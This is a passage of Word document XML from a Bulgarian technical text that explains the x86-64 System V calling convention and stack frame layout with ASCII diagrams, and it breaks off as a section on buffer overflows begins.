        <w:t xml:space="preserve">               +----+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>xorl %ecx,%ecx |\x31|  current</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">               +----+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                      0x4000B0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Програмен брояч</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Ref2190345"/>
      <w:bookmarkStart w:id="13" w:name="_Toc3540749"/>
      <w:r w:rsidRPr="00112660">
        <w:t>System V конвенция</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Функциите са неразделна част от модерните програмни езици. В различните езици те имат различни разновидности - в C++ например, методите са функции със специална семантика. Въпреки това, идеята, както е осъществена в езици като C и тези преди него, остава в същината си непроменена. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Функцията</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="8"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> в програмирането е аналогична на тези в математиката. Тя приема вход, обработва го и връща изход. За по-лесна работа, информацията на всяка функция се разделя и облича в кадър, още наричан контекст. При извикването на една функция този контекст се променя. За целта се изгражда нов кадър, който се премахва преди излизането на функцията. Дефинират се методи за запазване на стария контекст, предаване на параметри и връщане на стойности. Този процес се нарича ABI (Application Binary Interface) и е формализиран в конвенцията “System V”, която не е променяна от десетилетия и улеснява работата между процеси и операционна система. Единната семантика позволява оптимизации като динамично зареждане на библиотеки или оперативна съвместимост на различни езици. Така например, модерните операционни системи имат динамично зареждани и споделени библиотеки, както и обвързването (binding) на известни библиотеки като sqlite и qt, написани на C, за огромен набор от езици - python, java, javascript и други.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Други езици като go</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="9"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и rust нямат твърда конвенция. Добрата страна</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">на това е, че така разработчиците на компилаторите могат да променят тези детайли и по-трудно стават мишена на атака. Лошата е, че така намалява съвместимостта между различни версии на компилатори, дори могат да се </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>получат несъвместими промени. Въпреки това, тези езици предоставят методи за извикване на C функции, като използват неговата конвенция.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Един кадър (frame) има няколко части, както и няколко етапа, добавени от компилатора и обикновено скрити от програмиста, за попълване на кадъра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Преди извикването на една функция, старата трябва да запази регистрите, които използва. Когато функцията бъде извикана, тя очаква първите ѝ параметри в регистри rdi, rsi, rdx, rcx, r8, r9, а следващите - на стека в обратен ред. След тях се добавя адресът, от където следващата функция да продължи изпълнение и се предава контрол на функцията. За улеснение на тази стъпка може да се използва инструкция </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. След това в тялото на новата функция се запазва старият base pointer и неговата стойност се променя на текущия stack pointer. За тази стъпка също има инструкция за улеснение (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>), но на практика тя е твърде бавна</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="10"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и не се използва. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Вече може да се изпълнява тялото на новата функция. Тя е свободна да разширява и премахва информация от кадъра си на стека, както и, да извиква други функции. Няма ограничение за писане в предишни кадри, но езиците от по-високо ниво дефинират методи, за да не бъде презаписана важна информация (променливи). Също така те не могат да бъдат разширявани.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F56EB" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Когато приключи изпълнението си, функцията трябва, ако има стойност за връщане, да я постави в rax, и да се извърши обратният процес за изчистване на кадъра. За целта трябва да се копира rbp в rsp и запазеният rbp да бъде възстановен. Отново има инструкция - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>leave</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. След това може да се върне контрол на запазения адрес, с инструкция </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. На </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref2190072 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>+---------------+&lt;-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 9    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 8    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 7    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rip   |   rbp  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------ |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rbp   |--------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     var 1     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     var 2     |   rsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F5FC6" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Кадър на функция с девет параметъра</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t>може да се види нагледно един кадър</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>на функция с девет параметъра</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Ref2190072"/>
      <w:r>
        <w:t>+---------------+&lt;-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 9    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 8    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 7    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rip   |   rbp  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------ |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rbp   |--------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     var 1     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     var 2     |   rsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Кадър на функция с девет параметъра</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Има още известен брой подробности, които са незначителни за онагледяването на принципа на работа. Например регистри като r12 до r15, които също трябва да се запазят от извиканата функция или връщането на стойности над 64 бита.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>+---------------+        ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 8    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 7    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rip   |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rbp   |--------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     var 1     |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|    param 7    |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rip   |        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rbp   |--------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------rbp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|     var 1     |    rsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Два последователни кадъра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_v83vfpqn2io2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="16" w:name="_Toc3540750"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Buffer overflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Препълване или преливане на буфер (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
